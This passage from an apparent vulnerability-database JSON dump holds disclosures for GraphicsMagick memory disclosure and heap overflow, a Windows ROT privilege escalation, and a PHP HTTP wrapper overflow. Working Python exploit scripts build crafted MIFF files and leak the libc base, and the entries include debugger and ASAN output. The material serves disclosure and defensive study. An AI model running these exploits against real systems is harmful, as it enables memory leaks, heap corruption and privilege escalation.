is:\r\n\r\n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file,\r\n64 const MagickBool verbose)\r\n65 {\r\n...\r\n660 for (i=0; i < profile_length; )\r\n661 {\r\n662 if (profile[i] != 0x1c)\r\n663 {\r\n664 i++;\r\n665 continue;\r\n666 }\r\n667 i++; /* skip file separator */\r\n668 i++; /* skip record number */\r\n...\r\n725 i++;\r\n726 (void) fprintf(file,\" %.1024s:\\n\",tag);\r\n727 length=profile[i++] << 8;\r\n728 length|=profile[i++];\r\n729 text=MagickAllocateMemory(char *,length+1);\r\n730 if (text != (char *) NULL)\r\n731 {\r\n732 char\r\n733 **textlist;\r\n734\r\n735 register unsigned long\r\n736 j;\r\n737\r\n738 (void) strncpy(text,(char *) profile+i,length);\r\n739 text[length]='\\0';\r\n740 textlist=StringToList(text);\r\n741 if (textlist != (char **) NULL)\r\n742 {\r\n743 for (j=0; textlist[j] != (char *) NULL; j++)\r\n744 {\r\n745 (void) fprintf(file,\" %s\\n\",textlist[j]);\r\n...\r\n752 i+=length;\r\n753 }\r\n\r\n\r\nThe value in profile_length variable is set in the following field in the MIFF header: profile-iptc=8\r\n\r\nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i is never checked.\r\n\r\nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation.\r\n\r\n\r\ngef\u27a4 x/2xg profile\r\n0x8be210: 0x08000a001c414141 0x00007ffff690fba8\r\n\r\n\r\nThe 8 bytes 0x08000a001c414141 is the profile payload present in the specially crafted MIFF file.\r\n\r\n\r\n41 41 41 - padding\r\n1C - sentinel check in line 662\r\n00 - padding\r\n0A - \"Priority\" tag\r\n08 00 - 8 in big endian, the length\r\n\r\n\r\nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc.\r\n\r\n\r\ngef\u27a4 x/xw 0x00007ffff690fba8\r\n0x7ffff690fba8 <main_arena+136>: 0x008cdc40\r\ngef\u27a4 vmmap libc\r\nStart End Offset Perm Path\r\n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 ---\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r--\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw-\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n\r\nNow we can calculate the offset to libc base \u2013 0x3c4b98\r\n\r\nProof of Concept\r\n\r\n$ python miff/readexploit.py\r\n[+] Starting local process \u2018/usr/bin/gm\u2019: pid 20019\r\n[+] Receiving all data: Done (1.27KB)\r\n[*] Process \u2018/usr/bin/gm\u2019 stopped with exit code 0 (pid 20019)\r\n[*] Main Arena Leak: 0x7f72948adb98\r\n[*] libc Base: 0x7f72944e9000\r\n\r\n#!/usr/bin/python\r\n# GraphicsMagick IPTC Profile libc Leak\r\n \r\nfrom pwn import *\r\n \r\ndirectory = \"DIR\"\r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' +\r\n 'e-iptc=',\r\n '\\n\\x0c\\n:\\x1a',\r\n '\\n\\x00',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"readexploit.miff\"\r\nlength = 8\r\n \r\n#libc_main_arena_entry_offset = 0x3c4ba8\r\nlibc_main_arena_entry_offset = 0x3c4b98\r\n \r\ndef main():\r\n data = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\")\r\n header = partitions[0] + str(length) + partitions[1]\r\n payload = header + directory + partitions[2] + data + partitions[3]\r\n file(output, \"w\").write(payload)\r\n \r\n p = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output])\r\n output_leak = p.recvall()\r\n priority_offset = output_leak.index(\"Priority:\") + 12\r\n montage_offset = output_leak.index(\"Montage:\") - 3\r\n leak = output_leak[priority_offset:montage_offset]\r\n if \"0x00000000\" in leak:\r\n log.info(\"Unlucky run. Value corrupted by StringToList\")\r\n exit()\r\n main_arena_leak = u64(leak.ljust(8, \"\\x00\"))\r\n log.info(\"Main Arena Leak: 0x%x\" % main_arena_leak)\r\n libc_base = main_arena_leak - libc_main_arena_entry_offset\r\n log.info(\"libc Base: 0x%x\" % libc_base)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n \r\nHeap Overflow\r\nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file.\r\n\r\nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name.\r\n\r\n844 /*\r\n845 Display visual image directory.\r\n846 */\r\n847 image_info=CloneImageInfo((ImageInfo *) NULL);\r\n848 (void) CloneString(&image_info->size,\"64x64\");\r\n849 (void) fprintf(file,\" Directory:\\n\");\r\n850 for (p=image->directory; *p != '\\0'; p++)\r\n851 {\r\n852 q=p;\r\n853 while ((*q != '\\n') && (*q != '\\0'))\r\n854 q++;\r\n855 (void) strncpy(image_info->filename,p,q-p);\r\n856 image_info->filename[q-p]='\\0';\r\n857 p=q;\r\n...\r\n880 }\r\n881 DestroyImageInfo(image_info);\r\n\r\nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name.\r\n\r\n\r\ntype = struct _ImageInfo {\r\n...\r\n FILE *file;\r\n char magick[2053];\r\n char filename[2053];\r\n _CacheInfoPtr_ cache;\r\n void *definitions;\r\n Image *attributes;\r\n unsigned int ping;\r\n PreviewType preview_type;\r\n unsigned int affirm;\r\n _BlobInfoPtr_ blob;\r\n size_t length;\r\n char unique[2053];\r\n char zero[2053];\r\n unsigned long signature;\r\n}\r\n\r\nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag.\r\n\r\nProof of Concept\r\nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff.\r\n'''\r\n\r\n#!/usr/bin/python\r\n \r\nfrom pwn import *\r\n \r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' +\r\n ':\\x1a',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"exploit.miff\"\r\n \r\ndef main():\r\n payload = \"A\"*10000\r\n payload = partitions[0] + payload + partitions[1]\r\n file(output, \"w\").write(payload)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n''' \r\nRunning the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful.\r\n\r\n\r\ngef\u27a4 r identify -verbose exploit.miff\r\n...\r\ngef\u27a4 br describe.c:856\r\nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856.\r\n...\r\ngef\u27a4 p *image_info\r\n$3 = {\r\n...\r\n compression = UndefinedCompression,\r\n file = 0x0,\r\n magick = '\\000' <repeats 2052 times>,\r\n filename = 'A' <repeats 2053 times>,\r\n cache = 0x4141414141414141,\r\n definitions = 0x4141414141414141,\r\n attributes = 0x4141414141414141,\r\n ping = 0x41414141,\r\n preview_type = 1094795585,\r\n affirm = 0x41414141,\r\n blob = 0x4141414141414141,\r\n length = 0x4141414141414141,\r\n unique = 'A' <repeats 2053 times>,\r\n zero = 'A' <repeats 2053 times>,\r\n signature = 0x4141414141414141\r\n}\r\n'''", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43111/"}, {"lastseen": "2017-05-17T16:49:36", "bulletinFamily": "exploit", "description": "Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation. CVE-2017-0214. Dos exploit for Windows platform. Tags: Denial...", "modified": "2017-05-17T00:00:00", "published": "2017-05-17T00:00:00", "id": "EDB-ID:42021", "href": "https://www.exploit-db.com/exploits/42021/", "type": "exploitdb", "title": "Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1112\r\n\r\nWindows: Running Object Table Register ROTFLAGS_ALLOWANYCLIENT EoP\r\nPlatform: Windows 10 10586/14393 not tested 8.1 Update 2 or Windows 7\r\nClass: Elevation of Privilege\r\n\r\nSummary:\r\nBy setting an appropriate AppID it\u2019s possible for a normal user process to set a global ROT entry. This can be abused to elevate privileges.\r\n\r\nDescription:\r\n\r\nNOTE: I\u2019m not sure which part of this chain to really report. As far as I can tell it\u2019s pretty much all by design and fixing the initial vector seems difficult. Perhaps this is only a bug which can be fixed to prevent sandbox escapes?\r\n\r\nWhen registering an object in the ROT the default is to only expose that registration to the same user identity on the same desktop/window station. This includes preventing the same user at different ILs (such as between sandbox and normal user) from seeing the same registration. However it could be imagined that you might want to register an entry for all users/contexts so IRunningObjectTable::Register takes a grfFlags parameter with the value ROTFLAGS_ALLOWANYCLIENT which allows the ROT entry to be exposed to all users. \r\n\r\nThe description of this flag indicates it can only be used if the COM process is a Local Service or a RunAs application. In fact there\u2019s an explicit ROTFlags value for the AppID which would grant the privilege to a normal application. Quick testing proves this to be correct, a \u201cnormal\u201d application cannot expose the ROT entry to any client as RPCSS does a check that the calling process is allowed to expose the entry. However there are two clear problems with the check. Creating a RunAs COM object in the current session would typically run at the same privilege level as the caller, therefore an application which wanted to abuse this feature could inject code into that process. Secondly while it\u2019s not possible to register a per-user COM object which specifies a RunAs AppID it\u2019s possible to explicitly set the AppID when calling CoInitializeSecurity (either via the GUID or by naming your program to match one which maps to the correct AppID).\r\n\r\nTherefore in the current implementation effectively any process, including sandboxed ones should be able to register a global ROT entry. What can we do with this? The ROT is mainly used for OLE duties, for example Word and Visual Studio register entries for each document/project open. It would be nice not to rely on this, so instead I\u2019ll abuse another OLE component, which we\u2019ve seen before, the fact that LoadTypeLib will fall back to a moniker if it can\u2019t find the type library file specified.\r\n\r\nIf the file loading fails then LoadTypeLib will effectively call MkParseDisplayName on the passed in string. One of the things MPDN does is try and create a file moniker with the string passed in as an argument. File Monikers have an interesting feature, the COM libraries will check if there\u2019s a registered ROT entry for this file moniker already present, if it is instead of creating a new object it will call IRunningObjectTable::GetObject instead when binding. So as we can register a ROT entry for any user in any context we can provide our own implementation of ITypeLib running inside our process, by registering it against the path to the type library any other process which tries to open that library would instead get our spoofed one, assuming we can force the file open to fail.\r\n\r\nThis is the next key part, looking at the LoadTypeLib implementation the code calls FindTypeLib if this function fails the code will fall back to the moniker route. There\u2019s two opportunities here, firstly CreateFile is called on the path, we could cause this to fail by opening the file with no sharing mode, in theory it should fail. However in practice it doesn\u2019t most type libraries are in system location, if you don\u2019t have the possibility of write permission on the file the OS automatically applies FILE_SHARE_READ which makes it impossible to lock the file in its entirety. Also some TLBs are stored inside a DLL which is then used so this route is out. Instead the other route is more promising, VerifyIsExeOrTlb is called once the file is open to check the type of file to parse. This function tries to load the first 64 bytes and checks for magic signatures. We can cause the read to fail by using the LockFile API to put an exclusive lock on that part of the file. This also has the advantage that it doesn\u2019t affect file mappings so will also work with loaded DLLs. \r\n\r\nWe now can cause any user of a type library to get redirected to our \u201cfake\u201d one without abusing impersonation/symbolic link tricks. How can we use this to our advantage? The final trick is to abuse again the auto-generation of Stubs/Proxies from automation compatible interfaces. If we can get a more privileged process to use our type library when creating a COM stub we can cause a number of memory safety issues such as type confusion, arbitrary memory read/writes and extending the vtable to call arbitrary functions. This is an extremely powerful primitive, as long as you can find a more privileged process which uses a dual automation interface. For example the FlashBroker which is installed on every Win8+ machine is intentionally allowed to be created by sandboxed IE/Edge and uses dual interfaces with auto-generated Stubs. We could abuse for example the BrokerPrefSetExceptionDialogSize and BrokerPrefGetExceptionDialogSize to do arbitrary memory writes. This all works because the stub creation has no was of ensuring that the actual server implementation matches the generated stub (at least without full symbols) so it will blindly marshal pointers or call outside of the object's vtable.\r\n\r\nProof of Concept:\r\n\r\nI\u2019ve provided a PoC as a C# project. You need to compile it first. It fakes out the Windows Search Service\u2019s type library to modify the IGatherManagerAdmin2::GetBackoffReason method so that instead of marshaling a pointer to an integer for returning the caller can specify an arbitrary pointer value. When the method on the server side completes it will try and write a value to this address which will cause a Write AV. The Windows Search service would be ideal for abuse but many of the functions seem to require Administrator access to call. That\u2019s not to say you couldn\u2019t convert this into a full working exploit but I didn\u2019t.\r\n\r\n1) Compile the C# project. It should be compiled as a 64 bit executable.\r\n2) Restart the Windows Search service just to ensure it hasn\u2019t cached the stub previously. This probably isn\u2019t necessary but just to be certain.\r\n3) Attach a debugger to SearchIndexer.exe to catch the crash.\r\n4) Execute the PoC as a normal user (do not run under the VSHOST as the CoInitializeSecurity call will fail). You need to pass the path to the provided mssitlb.tlb file which has been modified appropriately.\r\n5) The service should crash trying to write a value to address 0x12345678\r\n\r\nCrash Dump:\r\n\r\n0:234> r\r\nrax=0000015ee04665a0 rbx=0000015ee0466658 rcx=0000015ee0466658\r\nrdx=0000000000000000 rsi=0000000000000004 rdi=0000000000000000\r\nrip=00007fff80e3a75d rsp=00000036541fdae0 rbp=00000036541fdb20\r\n r8=00000036541fd868 r9=0000015ee3bb50b0 r10=0000000000000000\r\nr11=0000000000000246 r12=0000015ee3c02988 r13=00000036541fe1c0\r\nr14=0000000012345678 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\nMSSRCH!CGatheringManager::GetBackoffReason+0x8d:\r\n00007fff`80e3a75d 418936 mov dword ptr [r14],esi ds:00000000`12345678=????????\r\n0:234> k\r\n # Child-SP RetAddr Call Site\r\n00 00000036`541fdae0 00007fff`b416d533 MSSRCH!CGatheringManager::GetBackoffReason+0x8d\r\n01 00000036`541fdb10 00007fff`b413b0d0 RPCRT4!Invoke+0x73\r\n02 00000036`541fdb60 00007fff`b2fa479a RPCRT4!NdrStubCall2+0x430\r\n03 00000036`541fe180 00007fff`b3853c93 combase!CStdStubBuffer_Invoke+0x9a [d:\\th\\com\\combase\\ndr\\ndrole\\stub.cxx @ 1446]\r\n04 00000036`541fe1c0 00007fff`b305ccf2 OLEAUT32!CUnivStubWrapper::Invoke+0x53\r\n05 (Inline Function) --------`-------- combase!InvokeStubWithExceptionPolicyAndTracing::__l7::<lambda_b8ffcec6d47a5635f374132234a8dd15>::operator()+0x42 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1805]\r\n06 00000036`541fe210 00007fff`b3001885 combase!ObjectMethodExceptionHandlingAction<<lambda_b8ffcec6d47a5635f374132234a8dd15> >+0x72 [d:\\th\\com\\combase\\dcomrem\\excepn.hxx @ 91]\r\n07 (Inline Function) --------`-------- combase!InvokeStubWithExceptionPolicyAndTracing+0x9e [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1808]\r\n08 00000036`541fe280 00007fff`b3006194 combase!DefaultStubInvoke+0x275 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1880]\r\n09 (Inline Function) --------`-------- combase!SyncStubCall::Invoke+0x1b [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1934]\r\n0a (Inline Function) --------`-------- combase!SyncServerCall::StubInvoke+0x1b [d:\\th\\com\\combase\\dcomrem\\servercall.hpp @ 736]\r\n0b (Inline Function) --------`-------- combase!StubInvoke+0x297 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2154]\r\n0c 00000036`541fe4a0 00007fff`b3008b47 combase!ServerCall::ContextInvoke+0x464 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1568]\r\n0d (Inline Function) --------`-------- combase!CServerChannel::ContextInvoke+0x83 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1458]\r\n0e (Inline Function) --------`-------- combase!DefaultInvokeInApartment+0x9e [d:\\th\\com\\combase\\dcomrem\\callctrl.cxx @ 3438]\r\n0f 00000036`541fe770 00007fff`b3007ccd combase!AppInvoke+0x8a7 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1618]\r\n10 00000036`541fe8a0 00007fff`b300b654 combase!ComInvokeWithLockAndIPID+0xb2d [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2686]\r\n11 00000036`541feb30 00007fff`b40fd433 combase!ThreadInvoke+0x1724 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 6954]\r\n12 00000036`541fedc0 00007fff`b40fbed8 RPCRT4!DispatchToStubInCNoAvrf+0x33\r\n13 00000036`541fee10 00007fff`b40fcf04 RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x288\r\n14 00000036`541fef10 00007fff`b40f922d RPCRT4!RPC_INTERFACE::DispatchToStubWithObject+0x404\r\n15 00000036`541fefb0 00007fff`b40f9da9 RPCRT4!LRPC_SCALL::DispatchRequest+0x35d\r\n16 00000036`541ff090 00007fff`b40f64dc RPCRT4!LRPC_SCALL::HandleRequest+0x829\r\n17 00000036`541ff180 00007fff`b40f48c9 RPCRT4!LRPC_SASSOCIATION::HandleRequest+0x45c\r\n18 00000036`541ff200 00007fff`b411eaca RPCRT4!LRPC_ADDRESS::ProcessIO+0xb29\r\n19 00000036`541ff350 00007fff`b422e490 RPCRT4!LrpcIoComplete+0x10a\r\n1a 00000036`541ff3f0 00007fff`b422bc66 ntdll!TppAlpcpExecuteCallback+0x360\r\n1b 00000036`541ff4a0 00007fff`b34b8102 ntdll!TppWorkerThread+0x916\r\n1c 00000036`541ff8b0 00007fff`b425c5b4 KERNEL32!BaseThreadInitThunk+0x22\r\n1d 00000036`541ff8e0 00000000`00000000 ntdll!RtlUserThreadStart+0x34\r\n\r\nExpected Result:\r\nNot doing what ever it did.\r\n\r\nObserved Result:\r\nIt did it!\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42021.zip\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42021/"}], "packetstorm": [{"lastseen": "2018-06-07T02:15:45", "bulletinFamily": "exploit", "description": "", "modified": "2018-06-06T00:00:00", "published": "2018-06-06T00:00:00", "id": "PACKETSTORM:148068", "href": "https://packetstormsecurity.com/files/148068/PHP-7.22-php_stream_url_wrap_http_ex-Buffer-Overflow.html", "title": "PHP 7.22 php_stream_url_wrap_http_ex Buffer Overflow", "type": "packetstorm", "sourceData": "`Description: \n------------ \nThe latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at: \n \nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 \n \nif (tmp_line[tmp_line_len - 1] == '\\n') { \n--tmp_line_len; \nif (tmp_line[tmp_line_len - 1] == '\\r') { \n--tmp_line_len; \n} \n} \n \nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed. \n \n$ bin/php --version \nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS ) \nCopyright (c) 1997-2018 The PHP Group \nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies \n \n \nTest script: \n--------------- \n$ xxd -g 1 poc \n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100.. \n \n$ nc -vvlp 8080 < poc \nListening on [0.0.0.0] (family 0, port 8080) \nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083) \nGET / HTTP/1.0 \nHost: localhost:8080 \nConnection: close \n \n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");' \n \nExpected result: \n---------------- \nNO CRASH \n \nActual result: \n-------------- \n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");' \n================================================================= \n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac \nREAD of size 1 at 0xbfc038ef thread T0 \n#0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 \n#1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979 \n#2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027 \n#3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550 \n#4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224 \n#5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573 \n#6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731 \n#7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760 \n#8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082 \n#9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123 \n#10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134 \n#11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042 \n#12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404 \n#13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82) \n#14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0) \nAddress 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack: \nThis frame has 13 object(s): \n[32, 36) 'transport_string' \n[96, 100) 'errstr' \n[160, 164) 'http_header_line_length' \n[224, 232) 'timeout' \n[288, 296) 'req_buf' \n[352, 360) 'tmpstr' \n[416, 432) 'ssl_proxy_peer_name' \n[480, 496) 'http_header' \n[544, 576) 'buf' \n[608, 736) 'tmp_line' \n[768, 1792) 'location' \n[1824, 2848) 'new_path' \n[2880, 3904) 'loc_path' \nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext \n(longjmp and C++ exceptions *are* supported) \nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex \nShadow bytes around the buggy address: \n0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4 \n0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4 \n0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4 \n0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00 \n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00 \n0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 \n0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \nShadow byte legend (one shadow byte represents 8 application bytes): \nAddressable: 00 \nPartially addressable: 01 02 03 04 05 06 07 \nHeap left redzone: fa \nHeap righ redzone: fb \nFreed Heap region: fd \nStack left redzone: f1 \nStack mid redzone: f2 \nStack right redzone: f3 \nStack partial redzone: f4 \nStack after return: f5 \nStack use after scope: f8 \nGlobal redzone: f9 \nGlobal init order: f6 \nPoisoned by user: f7 \nASan internal: fe \n==26249== ABORTING \nAborted \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148068/php722-overflow.txt"}, {"lastseen": "2017-11-05T20:00:04", "bulletinFamily": "exploit", "description": "", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "href": "https://packetstormsecurity.com/files/144878/GraphicsMagick-Memory-Disclosure-Heap-Overflow.html", "id": "PACKETSTORM:144878", "title": "GraphicsMagick Memory Disclosure / Heap Overflow", "type": "packetstorm", "sourceData": "`'''Vulnerabilities summary \nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick. \n \nGraphicsMagick is aThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeleras SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.a \n \nThe vulnerabilities found are: \n \nMemory Information Disclosure \nHeap Overflow \nCredit \nAn independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Securityas SecuriTeam Secure Disclosure program \n \nVendor response \nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18). \n \nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt \n \n \nVulnerabilities details \n \nMemory Information Disclosure \nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in DescribeImage function of the magick/describe.c file. \n \nThe portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image. \n \nThis vulnerability can be triggered with a specially crafted MIFF file. \n \nThe code which triggers the vulnerable code path is: \n \n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file, \n64 const MagickBool verbose) \n65 { \n... \n660 for (i=0; i < profile_length; ) \n661 { \n662 if (profile[i] != 0x1c) \n663 { \n664 i++; \n665 continue; \n666 } \n667 i++; /* skip file separator */ \n668 i++; /* skip record number */ \n... \n725 i++; \n726 (void) fprintf(file,\" %.1024s:\\n\",tag); \n727 length=profile[i++] << 8; \n728 length|=profile[i++]; \n729 text=MagickAllocateMemory(char *,length+1); \n730 if (text != (char *) NULL) \n731 { \n732 char \n733 **textlist; \n734 \n735 register unsigned long \n736 j; \n737 \n738 (void) strncpy(text,(char *) profile+i,length); \n739 text[length]='\\0'; \n740 textlist=StringToList(text); \n741 if (textlist != (char **) NULL) \n742 { \n743 for (j=0; textlist[j] != (char *) NULL; j++) \n744 { \n745 (void) fprintf(file,\" %s\\n\",textlist[j]); \n... \n752 i+=length; \n753 } \n \n \nThe value in profile_length variable is set in the following field in the MIFF header: profile-iptc=8 \n \nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i is never checked. \n \nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation. \n \n \ngefa$? x/2xg profile \n0x8be210: 0x08000a001c414141 0x00007ffff690fba8 \n \n \nThe 8 bytes 0x08000a001c414141 is the profile payload present in the specially crafted MIFF file. \n \n \n41 41 41 - padding \n1C - sentinel check in line 662 \n00 - padding \n0A - \"Priority\" tag \n08 00 - 8 in big endian, the length \n \n \nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc. \n \n \ngefa$? x/xw 0x00007ffff690fba8 \n0x7ffff690fba8 <main_arena+136>: 0x008cdc40 \ngefa$? vmmap libc \nStart End Offset Perm Path \n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 --- \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r-- \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw- \n/lib/x86_64-linux-gnu/libc-2.23.so \n \nNow we can calculate the offset to libc base a 0x3c4b98 \n \nProof of Concept \n \n$ python miff/readexploit.py \n[+] Starting local process a/usr/bin/gma: pid 20019 \n[+] Receiving all data: Done (1.27KB) \n[*] Process a/usr/bin/gma stopped with exit code 0 (pid 20019) \n[*] Main Arena Leak: 0x7f72948adb98 \n[*] libc Base: 0x7f72944e9000 \n \n#!/usr/bin/python \n# GraphicsMagick IPTC Profile libc Leak \n \nfrom pwn import * \n \ndirectory = \"DIR\" \npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' + \n'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' + \n'e-iptc=', \n'\\n\\x0c\\n:\\x1a', \n'\\n\\x00', \n'\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n') \noutput = \"readexploit.miff\" \nlength = 8 \n \n#libc_main_arena_entry_offset = 0x3c4ba8 \nlibc_main_arena_entry_offset = 0x3c4b98 \n \ndef main(): \ndata = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\") \nheader = partitions[0] + str(length) + partitions[1] \npayload = header + directory + partitions[2] + data + partitions[3] \nfile(output, \"w\").write(payload) \n \np = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output]) 